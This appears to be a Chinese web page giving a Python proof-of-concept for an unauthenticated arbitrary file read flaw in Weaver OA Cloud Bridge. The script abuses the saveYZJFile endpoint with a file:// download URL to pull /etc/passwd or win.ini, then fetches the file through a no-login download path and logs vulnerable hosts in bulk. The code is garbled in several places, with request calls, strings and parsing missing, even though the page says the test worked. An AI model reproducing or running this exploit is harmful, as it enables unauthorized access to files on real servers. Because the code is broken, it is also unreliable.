Python实现泛微OA云桥未授权任意⽂件读取
1.代码如下:
import requests
import json
from multiprocessing import Pool, Manager
def two(host,id,dirstr):
(url=host+'/file/fileNoLogin/'+id,verify=False, timeout=5)
if ('/bin/bash' and 'root' ) or 'bit' :
)
save=open('','a+')
save.write(host+' '+dirstr+'\n')
save.close()
def one(h,p):
dirstr=('/etc/passwd','/C:\Windows\win.ini')
for i in dirstr:
host = h +':' + p
getsavefilename
try:
if p=='':
host = h +':80'
(url=''+host+'/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://'+i+'&fileExt=txt',verify=False, timeout=5)            data = json.)
print(''+host,data['id'])
two(''+host,data['id'],i)
except:
pass
try:
if p=='':
host = h +':443'
(url=''+host+'/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://'+i+'&fileExt=txt',verify=False, timeout=5)            data = json.)
print(''+host,data['id'])
two(''+host,data['id'],i)
except:
pass
if __name__ == '__main__':
one('','80')
2.测试结果完好
标题

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。